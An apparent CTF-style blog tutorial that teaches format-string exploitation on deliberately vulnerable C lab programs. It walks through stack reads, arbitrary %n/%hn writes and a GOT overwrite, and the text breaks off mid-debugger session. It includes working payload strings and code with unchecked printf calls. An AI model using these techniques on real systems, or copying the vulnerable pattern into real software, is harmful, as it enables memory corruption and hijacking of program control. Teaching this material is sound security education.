Exploit 101 - Format Strings

21 minute read


I always had hard times to fully understand how to exploit Format Strings vulnerabilities. After a recent online challenge, I decided to tackle this problem and learn how to properly exploit them. Here, I’ll show you various ways to write exploits for those kind of vulerabilities and I hope it will help you for your next CTF !

Note The examples presented in this post have been tested on a Debian with ASLR disabled. I provide the compilation arguments for gcc if you want to test them on your own.

Watch out ! The dynamic analysis have been done with PEDA for gdb. The address alignment will be different outside gdb.

Format Strings

A format string refers to a control parameter used by a class of functions in string-processing libraries (like stdio.h). The most known are the following, but there are many more.

int printf(const char *format, ...)
int fprintf(FILE *stream, const char *format, ...)
int sprintf(char *str, const char *format, ...)
int vprintf(const char *format, va_list arg)
int vsprintf(char *str, const char *format, va_list arg)

The format string specifies a method for rendering data type parameters into a string. This string is then, by default, printed on the standard output.

For example, the C library function int printf(const char *format, ...) sends formatted output to stdout:

printf("Color %s, number1 %d, number2 %05d, hex %#x, float %5.2f, unsigned value %u.\n",
       "red", 123456, 89, 255, 3.14159, 250);

// It will print the following line
Color red, number1 123456, number2 00089, hex 0xff, float  3.14, unsigned value 250.

As you can see, if format includes a format specifiers (beginning with %), the additional arguments following format are formatted and inserted in the resulting string by replacing them with their respective specifiers. There are many specifiers, including :

Specifiers Output Example
d Signed decimal integer 392
u Unsigned decimal integer 7235
o Unsigned octal 610
x Unsigned hexadecimal integer 7fa
f Decimal floating point 392.65
c Character a
s String of characters sample
p Pointer address b8000000
n Nothing printed (will be explained later)  

Here is how a normal printf() call looks like on the stack :

image-center

Vulnerability

The format string vulnerability can be used to read or write memory and/or execute harmful code. The problem lies into the use of unchecked user input as the format string parameter that perform formatting. A malicious user may use the %s or %x format specifier, among others, to print data from the stack or other locations in memory. You can also write arbitrary data to arbitrary locations using the %n format specifier, but we will see that later.

Here is what happens on the stack when you don’t write any format specifiers when calling printf() :

image-center

Let me show you an example :

#include <stdio.h>
#include <string.h>

int main(int argc, char** argv) {

    char buffer[50];

    if (argc != 2) {
      return -1;
    }
    
    strncpy(buffer, argv[1], 50);
    printf(buffer);

    return 0;
}

Here, printf() does not contain any specifiers…

$ ./demo1 blah
blah

$ ./demo1 %x.%x.%x
bfb6c8b3.32.47a5d7

$ ./demo1 %08x.%08x.%08x
bfea28ad.00000032.004665d7

The %x specifiers is stored in buffer and interpreted by the printf() function resulting in reading data from the stack. For each %x, printf() will fetch a number from the stack, treat this number as an address, and print out the memory contents pointed by this address as a string.

Enough for the theory, let’s do some practice !

Reading the Stack

For the first demonstration, we’ll try to read a password from the stack.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// gcc -z execstack -z norelro -fno-stack-protector -o format0 format0.c

int main(int argc, char *argv[])
{
    char pass[10] = "AABBCCDD";
    int *ptr = pass;
    char buf[100];

    fgets(buf, 100, stdin);
    buf[strcspn(buf, "\n")] = '\0'; 

    if(!strncmp(pass, buf, sizeof(pass))){
        printf("Greetings!\n");
        return EXIT_SUCCESS;
    } else {
        printf(buf);
        printf(" does not have access!\n");
        exit(EXIT_FAILURE);
    }

    return EXIT_SUCCESS;
}

Here, we would like to read the *ptr variable as it contains the password. First, let’s run the executable.

user@gdb:~$ ./format0
%p
0xbffff67e does not have access!

Here, the %p prints the first argument printf() will find on the stack. Let’s take a look at the stack before calling printf().

[-------------------------------------code-------------------------------------]
   0x400737 <main+167>:	sub    esp,0xc
   0x40073a <main+170>:	lea    eax,[ebp-0x7a]
   0x40073d <main+173>:	push   eax
=> 0x40073e <main+174>:	call   0x4004a0 <printf@plt>
   0x400743 <main+179>:	add    esp,0x10
   0x400746 <main+182>:	sub    esp,0xc
   0x400749 <main+185>:	lea    eax,[ebx-0x1257]
   0x40074f <main+191>:	push   eax
Guessed arguments:
arg[0]: 0xbffff63e --> 0x7025 ('%p')
[------------------------------------stack-------------------------------------]
0000| 0xbffff620 --> 0xbffff63e --> 0x7025 ('%p')
0004| 0xbffff624 --> 0xbffff63e --> 0x7025 ('%p')
0008| 0xbffff628 --> 0xa ('\n')
0012| 0xbffff62c --> 0x4006a7 (<main+23>:	add    ebx,0x13ad)
0016| 0xbffff630 --> 0xbffff65e --> 0x40 ('@')
0020| 0xbffff634 --> 0x0 
0024| 0xbffff638 --> 0xb7fe5100 (<_dl_lookup_symbol_x+16>:	add    edi,0x19f00)
0028| 0xbffff63c --> 0x7025fc10 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x0040073e in main ()

The first argument on the stack is the format is the format specifier and the second, our string which is also the format specifiers as it is our input string. So, %p will print the pointer to our string : 0xbffff63e.

Now, what if we want to print the pointer to the password ? Well, in a format specifier, you can select a specific argument to print like, printf("%2$x", 1, 2, 3) will print 2.

So, we just need to know were is the pointer to the password on the stack and input %<num>$s. Here I use %s as we want to print the string, not the pointer. Here is the stack…

[------------------------------------stack-------------------------------------]
0000| 0xbffff620 --> 0xbffff63e --> 0x7025 ('%p')
0004| 0xbffff624 --> 0xbffff63e --> 0x7025 ('%p')
0008| 0xbffff628 --> 0xa ('\n')
0012| 0xbffff62c --> 0x4006a7 (<main+23>:	add    ebx,0x13ad)
0016| 0xbffff630 --> 0xbffff65e --> 0x40 ('@')
0020| 0xbffff634 --> 0x0 
0024| 0xbffff638 --> 0xb7fe5100 (<_dl_lookup_symbol_x+16>:	add    edi,0x19f00)
0028| 0xbffff63c --> 0x7025fc10 
0032| 0xbffff640 --> 0xbfff0000 --> 0x0 
0036| 0xbffff644 --> 0x0 
0040| 0xbffff648 --> 0xc10000 
0044| 0xbffff64c --> 0x0 
0048| 0xbffff650 --> 0xb7fff000 --> 0x23f40 
0052| 0xbffff654 --> 0xb7fff920 --> 0x400000 --> 0x464c457f 
0056| 0xbffff658 --> 0xbffff670 --> 0xffffffff 
0060| 0xbffff65c --> 0x400306 ("__libc_start_main")
0064| 0xbffff660 --> 0x0 
0068| 0xbffff664 --> 0xbffff704 --> 0xf28a634d 
0072| 0xbffff668 --> 0xb7fcb000 --> 0x1b2db0 
0076| 0xbffff66c --> 0xd ('\r')
0080| 0xbffff670 --> 0xffffffff 
0084| 0xbffff674 --> 0xb7fcb000 --> 0x1b2db0 
0088| 0xbffff678 --> 0xb7e24e18 --> 0x2bb6 
0092| 0xbffff67c --> 0xb7fd5858 --> 0xb7e18000 --> 0x464c457f 
0096| 0xbffff680 --> 0xb7fcb000 --> 0x1b2db0 
0100| 0xbffff684 --> 0xbffff764 --> 0xbffff886 ("/home/user/format0")
0104| 0xbffff688 --> 0xb7ffed00 --> 0x0 
0108| 0xbffff68c --> 0x40000 
0112| 0xbffff690 --> 0x0 
0116| 0xbffff694 --> 0x401a54 --> 0x1948 
0120| 0xbffff698 --> 0x1 
0124| 0xbffff69c --> 0x4007bb (<__libc_csu_init+75>:	add    edi,0x1)
0128| 0xbffff6a0 --> 0x41410001 
0132| 0xbffff6a4 ("BBCCDD")
0136| 0xbffff6a8 --> 0x4444 ('DD')
0140| 0xbffff6ac --> 0xbffff6a2 ("AABBCCDD") ; Here is the pointer
0144| 0xbffff6b0 --> 0xbffff6d0 --> 0x1 
0148| 0xbffff6b4 --> 0x0 
0152| 0xbffff6b8 --> 0x0 

As you can see, the string pointer is at the offset 35. If we want to read it, we have to enter the following string :

user@gdb:~$ ./format0
%35$s
AABBCCDD does not have access!

user@gdb:~$ ./format0
AABBCCDD
Good job !
user@gdb:~$ 

Easy, right ?

Writing to the Stack

Now you know how to read a specific argument on the stack, but we would like to go further and write on the stack ! Let’s take another example :

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

// gcc -z execstack -z norelro -fno-stack-protector -o format1 format1.c

int main(int argc, char *argv[])
{
    int target = 0xdeadc0de;
    char buffer[64];

    fgets(buffer, 64, stdin);
    printf(buffer);

    if(target == 0xcafebabe) {
      	printf("Good job !\n");
      	return EXIT_SUCCESS;
  	} else {
  	  	printf("Nope...\n");
  	  	exit(EXIT_FAILURE);
  	}
}

The goal here is to modify the target variable. It must be equal to 0xcafebabe. To do that, there is another interesting format specifier: %n. According to the printf() man page, here is what %n should do :

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

Hum, It’s a bit cryptic… Basically, it means that %n will write the size of our input at the address pointed by %n. For example, the following input : AAAA%n, means that we will write the value 4 (because the size of “AAAA” equals 4) at the address pointed by %n. But, where on the stack %n points to ?

Well, let’s try to submit AAAA%n into the program :

// Check the pointer
$ ./format1
AAAA.%p       
AAAA.0x40
Nope...

// Write 
$ ./format1
AAAA.%n
Segmentation fault

Ooops, segfault… Why ? That’s because we try to write the value 4 (the size of our string) at the address 0x40 (the address pointed by %n) so, obviously it segfault…

To solve the challenge, you have to remember 2 things :

  • You control the input
  • We can specify a postion to read/write on the stack with %<num>$n

So, instead of using a simple %n, we can use %<num>$n to specify the address to write to. What would happens if %<num>$n points to the start of our string ? Well, it will use the address specified in the beggining of our strings to write data to.

First, to write 0xcafebabe in target, we have to find the target pointer on the stack.

[------------------------------------stack-------------------------------------]
0000| 0xbffff650 --> 0xbffff66c ("AAAA\n")
0004| 0xbffff654 --> 0x40 ('@')
0008| 0xbffff658 --> 0xb7fcb5a0 --> 0xfbad2288 
0012| 0xbffff65c --> 0x400637 (<main+23>:	add    ebx,0x1351)
0016| 0xbffff660 --> 0x0 
0020| 0xbffff664 --> 0xbffff704 --> 0x7d074f84 
0024| 0xbffff668 --> 0xb7fcb000 --> 0x1b2db0 
0028| 0xbffff66c ("AAAA\n")
0032| 0xbffff670 --> 0xffff000a 
0036| 0xbffff674 --> 0xb7fcb000 --> 0x1b2db0 
0040| 0xbffff678 --> 0xb7e24e18 --> 0x2bb6 
0044| 0xbffff67c --> 0xb7fd5858 --> 0xb7e18000 --> 0x464c457f 
0048| 0xbffff680 --> 0xb7fcb000 --> 0x1b2db0 
0052| 0xbffff684 --> 0xbffff764 --> 0xbffff885 ("/home/user/format1")
0056| 0xbffff688 --> 0xb7ffed00 --> 0x0 
0060| 0xbffff68c --> 0x40000 
0064| 0xbffff690 --> 0x0 
0068| 0xbffff694 --> 0x401988 --> 0x187c 
0072| 0xbffff698 --> 0x1 
0076| 0xbffff69c --> 0x40070b (<__libc_csu_init+75>:	add    edi,0x1)
0080| 0xbffff6a0 --> 0x1 
0084| 0xbffff6a4 --> 0xbffff764 --> 0xbffff885 ("/home/user/format1")
0088| 0xbffff6a8 --> 0xbffff76c --> 0xbffff898 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
0092| 0xbffff6ac --> 0xdeadc0de ; Here is the pointer
0096| 0xbffff6b0 --> 0xbffff6d0 --> 0x1 
0100| 0xbffff6b4 --> 0x0 
0104| 0xbffff6b8 --> 0x0 
0108| 0xbffff6bc --> 0xb7e30286 (<__libc_start_main+246>:	add    esp,0x10)
0112| 0xbffff6c0 --> 0x1 
0116| 0xbffff6c4 --> 0xb7fcb000 --> 0x1b2db0 
[------------------------------------------------------------------------------]

It seems that the target pointer is the 23rd argument on the stack 0xbffff6ac. We want to replace the value at 0xbffff6ac, but how do we specify this address ?

As I said earlier, if we can find the pointer to “AAAA”, we can replace AAAA by a specific address to write to. Just recheck the stack, you’ll see that “AAAA” is the 7th argument.

$ ./format1
AAAA%7$p
AAAA0x41414141
Nope...

So, the following input \xac\xf6\xff\xbf%7$n should write “4” at 0xbffff6ac. Let’s me show you…

gdb-peda$ b *0x00400665 ; Break @printf()
Breakpoint 1 at 0x400665
gdb-peda$ b *0x0040066a ; Break right after printf()
Breakpoint 2 at 0x40066a
gdb-peda$ run < <(python -c 'print "\xac\xf6\xff\xbf" + "%7$n"')
Starting program: /home/user/format1 < <(python -c 'print "\xac\xf6\xff\xbf" + "%7$n"')

[-------------------------------------code-------------------------------------]
   0x40065e <main+62>:	sub    esp,0xc
   0x400661 <main+65>:	lea    eax,[ebp-0x4c]
   0x400664 <main+68>:	push   eax
=> 0x400665 <main+69>:	call   0x400450 <printf@plt>
   0x40066a <main+74>:	add    esp,0x10
   0x40066d <main+77>:	cmp    DWORD PTR [ebp-0xc],0xcafebabe
   0x400674 <main+84>:	jne    0x40068f <main+111>
   0x400676 <main+86>:	sub    esp,0xc

Breakpoint 1, 0x00400665 in main ()
gdb-peda$ x/x 0xbffff6ac ; Check the value @ 0xbffff6ac
0xbffff6ac:	0xdeadc0de
gdb-peda$ continue
Continuing.
????

[-------------------------------------code-------------------------------------]
   0x400661 <main+65>:	lea    eax,[ebp-0x4c]
   0x400664 <main+68>:	push   eax
   0x400665 <main+69>:	call   0x400450 <printf@plt>
=> 0x40066a <main+74>:	add    esp,0x10
   0x40066d <main+77>:	cmp    DWORD PTR [ebp-0xc],0xcafebabe
   0x400674 <main+84>:	jne    0x40068f <main+111>
   0x400676 <main+86>:	sub    esp,0xc
   0x400679 <main+89>:	lea    eax,[ebx-0x1248]


Breakpoint 2, 0x0040066a in main ()
gdb-peda$ x/x 0xbffff6ac ; Check the value @ 0xbffff6ac (again)
0xbffff6ac:	0x00000004

Nice ! But we don’t want to write 4, we want to write 0xcafebabe. Here, we got 2 issues, first, if writing 4 chars as input means writing “4” at a specific address. Well, you’ll have to write 3405691582 (0xcafebabe in decimal) chars to write 0xcafebabe… impossible !

But, here is a trick : AAAA%<value-4>x%7$n (it’s value-4 because we already wrote 4 bytes, AAAA). For example, AAAA%96x%7$n will write the value 100 at the address 0x41414141. Why ? Because %100x will print your agument padded with 100 bytes (FYI, it pads with “space”).

$ ./format1
%x
40
Nope...
$ ./format1
%20x
                  40 # See the padding ?
Nope...

Watch Out ! It’s %<Y>x NOT %<Y>$x. The first one will pad the 1st argument with Y bytes. However, the second one will print the Yth argument.

The second issue is that you don’t want to do AAAA%3405691578x%7$n, because it will write a 3405691582 length pad on the standard output, it’ll take forever ! So, instead of writing a long integer (4 bytes), we’ll write 2 short integers (2 bytes). To do that, we’ll use another specifier : %hn.

Let’s break this down :

  • We want to write 0xcafebabe. It means, 0xcafe (51966 in decimal) in the high order bytes and 0xbabe (47806 in decimal) in the low order bytes.
  • We want to write those value at 0xbffff6ac. It means writing 0xcafe at 0xbffff6ac + 2 = 0xbffff6ae (high order) and 0xbabe at 0xbffff6ac (low order).

Now, we have to figure out the value to set for the padding. Here is the formula :

[The value we want] - [The bytes alredy wrote] = [The value to set].

Let’s start with the low order bytes :

It’ll will be 47806 - 8 = 47798, because we already wrote 8 bytes (the two 4 bytes addresses).

Then, the high order bytes :

It’ll will be 51966 - 47806 = 4160, because we already wrote 47806 bytes (the two 4 bytes addresses and 47798 bytes from the previous writing).

Now we can construct the exploit :

It’ll be : \xac\xf6\xff\xbf\xae\xf6\xff\xbf%47798x%7$hn%4160x%8$hn. Let me explain :

  • \xac\xf6\xff\xbf or 0xbffff6ac (in reverse order) points to the low order bytes.
  • \xae\xf6\xff\xbf or 0xbffff6ae (in reverse order) points to the high order bytes.
  • %47798x will write 47798 bytes on the standard output.
  • %7$hn will write 8 + 47798 = 47806 bytes (or 0xbabe) at the first address specified (0xbffff6ac).
  • %4160x will write 4160 bytes on the standard output.
  • %8$hn will write 8 + 47798 + 4160 = 51966 (or 0xcafe) at the second address specified (0xbffff6ae).

Let’s try that in GDB.

gdb-peda$ b *0x00400665 ; Break @printf()
Breakpoint 1 at 0x400665
gdb-peda$ b *0x0040066a ; Break right after printf()
Breakpoint 2 at 0x40066a
gdb-peda$ run < <(python -c 'print "\xac\xf6\xff\xbf\xae\xf6\xff\xbf%47798x%7$hn%4160x%8$hn"')
Starting program: /home/user/format1 < <(python -c 'print "\xac\xf6\xff\xbf\xae\xf6\xff\xbf%47798x%7$hn%4160x%8$hn"')

Breakpoint 1, 0x00400665 in main ()
gdb-peda$ x/x 0xbffff6ac
0xbffff6ac:	0xdeadc0de ; Before printf()
gdb-peda$ conti
Continuing.
????????   

Breakpoint 2, 0x0040066a in main ()
gdb-peda$ x/x 0xbffff6ac
0xbffff6ac:	0xcafebabe ; After printf()          

gdb-peda$ conti
Continuing.
Good job !
[Inferior 1 (process 1118) exited normally]
Warning: not running or target is remote          

Done ! It’s not that easy to grasp the concept but with some practice you’ll get it !

Use Cases

We got the concept. Now, we’ll try some practical exercises to make sure you master this skill !

Random Write

Let’s start with a simple one. Here we got a target variable, the goal is to replace this value with anything to make the condition true. FYI, unitialized variables are set to 0.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

// gcc -static -z execstack -z norelro -fno-stack-protector -o format1 format1.c
// Ref. https://exploit-exercises.com/protostar/format1/

int target;

void vuln(char *string)
{
  printf(string);
  
  if(target) {
      printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}

As target is outside the scope of a function, it will be located in the .bss of the binary. We can find it easily using the following command :

$ objdump -t ./format1 | grep target
080ebaa0 g     O .bss	00000004 target

Now, we have to find at which offset our argument (in fact, our inout) will be in the stack, we can bruteforce that easily :

$ ./format1 AAAA%x.%x.%x.%x.%x.%x%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

AAAAbffff5e0.1.80489b8.2.8048190.bffff5088048a1e.bffff6fb.49656e69.0.8048a06.80ea110.bffff520.0.8048c5e.80ea0bc.49656e69.0.8048c5e.2.bffff5d4.bffff5e0.bffff544.0.2.bffff5d4.80489f0.0.8048190.80ea0bc.49656e69.0.65a8ab54.935aa23b.0.0.0.0.0.0.756e6547.1.8048ff4.8049580.8049620.0.bffff5cc.6.3c.3.30.0.2.0.8048880.80489f0.2.bffff5d4.8049580.8049620.0.bffff5cc.0.2.bffff6f1.bffff6fb.0.bffff8a1.bffffe5d.bffffe91.bffffea2bffffeb5.bffffebf.bffffed3.bffffee3.bfffff05.bfffff18.bfffff2c.bfffff40.bfffff50.bfffff58.bfffff6a.bfffff77.bfffff96.bfffffd4.bfffffe6.0.20.b7ffecf0.21.b7ffe000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.5.7.0.8.0.9.804885f.b.3e8.c.3e8.d.3e8.e.3e8.17.0.19.bffff6db.1f.bffffff2.f.bffff6eb.0.0.0.0.df000000.75be3dcc.ba15cd21.c9285987.69096277.363836.662f2e00.616d726f.41003174.25414141.78252e78

Well, it seems to be between argument 141 and 142 :

$ ./format1 AAAA%141\$p
AAAA0x41410031
$ ./format1 AAAA%142\$p
AAAA0x31254141

That’s not really a problem, we just need to add some chars…

$ ./format1 AAAABB%141\$p
AAAABB0x41414141

Now, we have to replace the A’s with the address of target.

$ ./format1 `python -c 'print "\xa0\xba\x0e\x08BB%141\$n"'`
?BByou have modified the target :)

Ok, that was an easy one !

Precision Write

This exercise is similar to the first one, but this time we have to write 64 into target

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

// gcc -static -z execstack -z norelro -fno-stack-protector -o format2 format2.c

void vuln()
{
  int target = 0;
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);
  printf(buffer);
  
  if(target == 64) {
      printf("you have modified the target !\n");
  } 
}

int main(int argc, char **argv)
{
  vuln();
}

First, let’s find our argument on the stack…

$ ./format2 
AAAA%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
AAAA00000200.080ea400.080489bb.00000000.00000000.00000000.41414141.78383025.3830252e
user@gdb:~/demo$ ./format2 
AAAA%7$p
AAAA0x41414141

It seems to be the 7th argument. Now we need to find the address of target and write 64 at this address. Let’s run GDB and place a breakpoint at the if condition.

$ gdb -q format2 
Reading symbols from format2...(no debugging symbols found)...done.
gdb-peda$ disas vuln
Dump of assembler code for function vuln:
   0x080489ac <+0>:	push   ebp
   0x080489ad <+1>:	mov    ebp,esp
   0x080489af <+3>:	push   ebx
   0x080489b0 <+4>:	sub    esp,0x214
   0x080489b6 <+10>:	call   0x8048890 <__x86.get_pc_thunk.bx>
   0x080489bb <+15>:	add    ebx,0xa16f5
   0x080489c1 <+21>:	mov    DWORD PTR [ebp-0xc],0x0
   0x080489c8 <+28>:	mov    eax,0x80ea55c
   0x080489ce <+34>:	mov    eax,DWORD PTR [eax]
   0x080489d0 <+36>:	sub    esp,0x4
   0x080489d3 <+39>:	push   eax
   0x080489d4 <+40>:	push   0x200
   0x080489d9 <+45>:	lea    eax,[ebp-0x20c]
   0x080489df <+51>:	push   eax
   0x080489e0 <+52>:	call   0x804f5f0 <fgets>
   0x080489e5 <+57>:	add    esp,0x10
   0x080489e8 <+60>:	sub    esp,0xc
   0x080489eb <+63>:	lea    eax,[ebp-0x20c]
   0x080489f1 <+69>:	push   eax
   0x080489f2 <+70>:	call   0x804f1d0 <printf>
   0x080489f7 <+75>:	add    esp,0x10
   0x080489fa <+78>:	cmp    DWORD PTR [ebp-0xc],0x40 ; Right here !
   0x080489fe <+82>:	jne    0x8048a12 <vuln+102>
   0x08048a00 <+84>:	sub    esp,0xc
   0x08048a03 <+87>:	lea    eax,[ebx-0x2da08]
   0x08048a09 <+93>:	push   eax
   0x08048a0a <+94>:	call   0x804fa00 <puts>
   0x08048a0f <+99>:	add    esp,0x10
   0x08048a12 <+102>:	nop
   0x08048a13 <+103>:	mov    ebx,DWORD PTR [ebp-0x4]
   0x08048a16 <+106>:	leave  
   0x08048a17 <+107>:	ret    
End of assembler dump.
gdb-peda$ break *0x080489fa
Breakpoint 1 at 0x80489fa
gdb-peda$ run
Starting program: /home/user/demo/format2 
TEST   
TEST

[----------------------------------registers-----------------------------------]
EAX: 0x5 
EBX: 0x80ea0b0 --> 0x0 
ECX: 0x80eddf8 ("TEST\n")
EDX: 0x80eb574 --> 0x0 
ESI: 0x80ea0bc --> 0x80680c0 (<__strcpy_sse2>:	mov    edx,DWORD PTR [esp+0x4])
EDI: 0x49656e69 ('ineI')
EBP: 0xbffff668 --> 0xbffff678 --> 0x0 
ESP: 0xbffff450 --> 0x0 
EIP: 0x80489fa (<vuln+78>:	cmp    DWORD PTR [ebp-0xc],0x40)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80489f1 <vuln+69>:	push   eax
   0x80489f2 <vuln+70>:	call   0x804f1d0 <printf>
   0x80489f7 <vuln+75>:	add    esp,0x10
=> 0x80489fa <vuln+78>:	cmp    DWORD PTR [ebp-0xc],0x40
   0x80489fe <vuln+82>:	jne    0x8048a12 <vuln+102>
   0x8048a00 <vuln+84>:	sub    esp,0xc
   0x8048a03 <vuln+87>:	lea    eax,[ebx-0x2da08]
   0x8048a09 <vuln+93>:	push   eax
[------------------------------------stack-------------------------------------]
0000| 0xbffff450 --> 0x0 
0004| 0xbffff454 --> 0x0 
0008| 0xbffff458 --> 0x0 
0012| 0xbffff45c ("TEST\n")
0016| 0xbffff460 --> 0xa ('\n')
0020| 0xbffff464 --> 0x0 
0024| 0xbffff468 --> 0x0 
0028| 0xbffff46c --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x080489fa in vuln ()
gdb-peda$ x/x $ebp-0xc
0xbffff65c:	0x00000000 ; Target address

So, target is at 0xbffff65c. Now, we just need to write the proper value at this address. The following input should do the trick : "\x5c\xf6\xff\xbf%x60%7$n". Note that we only need to add 60 as the address is 4 bytes long.

gdb-peda$ run < <(python -c 'print "\x5c\xf6\xff\xbf%60x%7$n"')
Starting program: /home/user/demo/format2 < <(python -c 'print "\x5c\xf6\xff\xbf%60x%7$n"')
\???                                                         200
you have modified the target !
[Inferior 1 (process 5414) exited normally]
Warning: not running or target is remote

Done !

Code Execution Redirect

In this use case, we have to redirect the execution flow.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

// gcc -z execstack -z norelro -no-pie -fno-stack-protector -o format4 format4.c
// Ref. https://exploit-exercises.com/protostar/format4/

void hello()
{
  printf("Code execution redirected !\n");
  _exit(1);
}

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);

  printf(buffer);

  exit(1);   
}

int main(int argc, char **argv)
{
  vuln();
}

Here, you should already have a good understanding of what we have to do. However, there is a trick. I’m sure that you think we need to overwrite the return address of main() with the address of hello(), but it won’t work…

Why ? Because vuln() calls exit(1) at the end of his routine. It means that we never return to main() ! So, what do we do now ? Well, we’ll use a trick called GOT Overwrite.

Basically, when the program is executed, the GOT (Global Offset Table) is initialized for every external functions (like libc functions). By doing so, the executable will cache the memory address in the GOT, so that it doesn’t have to ask libc each time an external function is called.

The goal here will be to overwrite the address of exit() in the GOT with the address of hello(). There are 4 steps here :

  • Find the address of hello()
  • Find the address of exit() in GOT
  • Find the offset of our string on the stack
  • Write the proper exploit string

Let’s find the addresses of exit() and hello()

$ objdump -R format4

format4:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049888 R_386_GLOB_DAT    __gmon_start__
0804988c R_386_GLOB_DAT    stdin@GLIBC_2.0
0804989c R_386_JUMP_SLOT   printf@GLIBC_2.0
080498a0 R_386_JUMP_SLOT   _exit@GLIBC_2.0
080498a4 R_386_JUMP_SLOT   fgets@GLIBC_2.0
080498a8 R_386_JUMP_SLOT   puts@GLIBC_2.0
080498ac R_386_JUMP_SLOT   exit@GLIBC_2.0 # Address of exit()
080498b0 R_386_JUMP_SLOT   __libc_start_main@GLIBC_2.0


$ objdump -t format4 | grep hello
080484cb g     F .text	0000002e              hello

We have to change the value pointed by 080498ac (exit()) with the address of hello(): 080484cb. Now, concerning the position of our string, it’s the 4th parameters on the stack :

$ ./format4
AAAA%08x.%08x.%08x.%08x.%08x.%08x
AAAA00000200.b7fcb5a0.08048508.41414141.78383025.3830252e
$ ./format4
AAAA%4$p
AAAA0x41414141

Here, we’ll write 080484cb in two parts, the low order bytes then, the high order bytes. Those bytes should be wrote at 080498ac, the call to exit(). Let’s give it a try by placing a breakpoint at printf() :

gdb-peda$ disas vuln
Dump of assembler code for function vuln:
   0x080484f9 <+0>:	push   ebp
   0x080484fa <+1>:	mov    ebp,esp
   0x080484fc <+3>:	push   ebx
   0x080484fd <+4>:	sub    esp,0x204
   0x08048503 <+10>:	call   0x8048400 <__x86.get_pc_thunk.bx>
   0x08048508 <+15>:	add    ebx,0x1388
   0x0804850e <+21>:	mov    eax,DWORD PTR [ebx-0x4]
   0x08048514 <+27>:	mov    eax,DWORD PTR [eax]
   0x08048516 <+29>:	sub    esp,0x4
   0x08048519 <+32>:	push   eax
   0x0804851a <+33>:	push   0x200
   0x0804851f <+38>:	lea    eax,[ebp-0x208]
   0x08048525 <+44>:	push   eax
   0x08048526 <+45>:	call   0x8048380 <fgets@plt>
   0x0804852b <+50>:	add    esp,0x10
   0x0804852e <+53>:	sub    esp,0xc
   0x08048531 <+56>:	lea    eax,[ebp-0x208]
   0x08048537 <+62>:	push   eax
   0x08048538 <+63>:	call   0x8048360 <printf@plt> ; Place the breakpoint here
   0x0804853d <+68>:	add    esp,0x10
   0x08048540 <+71>:	sub    esp,0xc
   0x08048543 <+74>:	push   0x1
   0x08048545 <+76>:	call   0x80483a0 <exit@plt>
End of assembler dump.
gdb-peda$ br *0x08048538
Breakpoint 1 at 0x8048538
gdb-peda$ run < <(python -c 'print "\xac\x98\x04\x08%4$n"')
Starting program: /home/user/demo/format4 < <(python -c 'print "\xac\x98\x04\x08%4$n"')

[----------------------------------registers-----------------------------------]
EAX: 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
EBX: 0x8049890 --> 0x80497a0 --> 0x1 
ECX: 0xb7fcc87c --> 0x0 
EDX: 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
ESI: 0x1 
EDI: 0xb7fcb000 --> 0x1b2db0 
EBP: 0xbffff688 --> 0xbffff698 --> 0x0 
ESP: 0xbffff470 --> 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
EIP: 0x8048538 (<vuln+63>:	call   0x8048360 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804852e <vuln+53>:	sub    esp,0xc
   0x8048531 <vuln+56>:	lea    eax,[ebp-0x208]
   0x8048537 <vuln+62>:	push   eax
=> 0x8048538 <vuln+63>:	call   0x8048360 <printf@plt>
   0x804853d <vuln+68>:	add    esp,0x10
   0x8048540 <vuln+71>:	sub    esp,0xc
   0x8048543 <vuln+74>:	push   0x1
   0x8048545 <vuln+76>:	call   0x80483a0 <exit@plt>
Guessed arguments:
arg[0]: 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
[------------------------------------stack-------------------------------------]
0000| 0xbffff470 --> 0xbffff480 --> 0x80498ac --> 0x80483a6 (<exit@plt+6>:	push   0x20)
0004| 0xbffff474 --> 0x200 
0008| 0xbffff478 --> 0xb7fcb5a0 --> 0xfbad2088 
